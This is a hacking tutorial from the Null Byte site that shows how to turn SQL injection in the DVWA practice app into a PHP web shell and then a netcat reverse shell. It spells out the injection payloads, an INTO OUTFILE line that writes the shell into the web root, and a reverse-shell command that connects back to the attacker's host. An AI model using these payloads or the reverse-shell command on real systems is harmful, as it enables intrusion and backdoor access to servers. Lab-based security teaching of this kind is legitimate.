
How to Use SQL Injection to Run OS Commands & Get a Shell « Null Byte :: WonderHowTo



One of the ultimate goals in hacking is the ability to obtain shells in order to run system commands and own a target or network. SQL injection is typically associated with databases and their data, but it can actually be used as a vector to gain a command shell.

We will use DVWA (Damn Vulnerable Web Application), an intentionally vulnerable web app, together with Kali Linux to carry out our attack against one of the most common web vulnerabilities there is: SQL injection.

SQL Injection Overview

SQL injection is one of the most common vulnerabilities found on the web and can be one of the most dangerous. Attackers inject SQL syntax through application input in order to extract sensitive information, modify or destroy existing data, or escalate the attack in an attempt to own the server.

There are many different types of SQL injection and different attack methods for the various database systems in use. Although this type of attack is one of the easiest to get started with, SQL injection can take years to truly master.

Step 1: Target Enumeration

The first thing we need to do is log in to DVWA using the default credentials: admin as the username and password as the password.

Next, go to the "Security" tab on the left, and set the security level to "low."

Navigate to the "SQL Injection" page to begin our attack.

We want to verify that the input is actually vulnerable to SQL injection. The quickest check is to submit a lone single quote (') as the user ID: if the input is not sanitized, the quote closes the string literal in the query early and leaves the rest of the statement malformed. When we do this, we see that the page returns a syntax error, which even tells us that the backend is MySQL.

The next thing we need to do is enumerate the database and determine the number of columns the query selects. This will allow us to exploit a union-based injection flaw in a bit.

select first_name, surname from users where user_id = '';

This is probably what the query looks like on the backend, with first_name and surname being the selected columns, for a total of two columns. But we need to know for sure in order for this to work. For that, we can use the order by clause.

This clause sorts the results of the query by the column at a given position. Since we are fairly sure there are at least two columns in use, ordering by 1 or 2 should complete successfully. But what if we order by 3? If we are correct, that query should throw an error, because there is no third column to sort on.

Submit the following injection as input, and it should result in an error.

 ' order by 3 # 

We can see that we do indeed get an error, so now we

Step 2: Shell Access & Command Execution

Now that we have a little more information about the database, we can use it to perform a union-based SQL injection. UNION combines the result sets of two SELECT statements, but both statements must return the same number of columns, which is why we needed to count them first.

There are many things we can do with union-based injections, but this tutorial focuses on using one to write a file to the web server so we can run OS commands.

We need to know the web server's document root so we can write our shell somewhere the server will execute it. This varies with the application and the web server in use, especially if an admin has moved the default location or locked down permissions. For this demo we assume the default Apache web root (/var/www/) is world-writable; that matters because INTO OUTFILE writes the file as the MySQL server's own user, not as the web server user. Two further preconditions hold in this lab but rarely in production: the MySQL account the application connects with must have the FILE privilege, and the secure_file_priv setting must not restrict where the server may write. Information about the web server, including the document root, can usually be found in a phpinfo() page (DVWA ships one as phpinfo.php).

We can use MySQL's INTO OUTFILE clause to write the query's result to a file. In this case, we want the file to contain a simple PHP script that runs system commands: a one-liner, which we will aptly name "cmd.php," that hands a URL parameter to a PHP command-execution function such as system().

  

Now, let's perform the injection. Note that both the PHP script and the output path are wrapped in single quotes; this keeps the statement syntactically valid.

 ' union select 1,'<contents of cmd.php>' into outfile '/var/www/dvwa/cmd.php' # 

If this worked, we can now reach our shell by URL and pass a system command as the parameter. For example, whoami will give us the current user.

Or uname -a, which will give

But running every command through a URL parameter is tedious.

Step 3: Reverse Shell with Netcat

Netcat is a powerful networking utility that is normally used to troubleshoot connectivity issues, but attackers also use it as a backdoor and as a way to get a shell. Many Linux distros have it installed by default, so if we can run commands, it is often game over. One caveat: not every netcat build supports the -e option used below (the OpenBSD variant shipped by several distros omits it), so check which one the target has.

We first set up a listener on our local machine. Use the nc command with -l to listen, -v for verbose output, and -p to set the port number.

 nc -lvp 1234
listening on [any] 1234 ... 

Next, as the parameter to our PHP shell in the URL, enter the following command (URL-encoded, since it travels in the query string). It tells netcat on the target to connect back to our machine and attach a shell to the connection (-e /bin/sh).

 nc 172.16.1.100 1234 -e /bin/sh 

Give it a few seconds, and we should see our listener catch the shell and open a connection. From there we can run id, uname -a, ps, and whatever else we see fit.

 connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 47643
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ps
  PID TTY          TIME CMD
 4665 ?        00:00:00 apache2
 4669 ?        00:00:00 apache2
 4671 ?        00:00:00 apache2
 4673 ?        00:00:00 apache2
 4674 ?        00:00:00 apache2
 4803 ?        00:00:00 apache2
 4810 ?        00:00:00 apache2
 4914 ?        00:00:00 php
 4915 ?        00:00:00 sh
 4919 ?        00:00:00 ps 

Wrapping Up

In this guide, we learned how to identify a vulnerable SQL injection point, enumerate the backend database, and use that information to write a simple web shell to the target system and turn it into a reverse shell, giving us backdoor access to the web server as the www-data user.

Don't Miss: How to Use Netcat, the Swiss Army Knife of Hacking Tools

Cover image by NewPaddy / Pixabay; Screenshots by drd_ / Null Byte
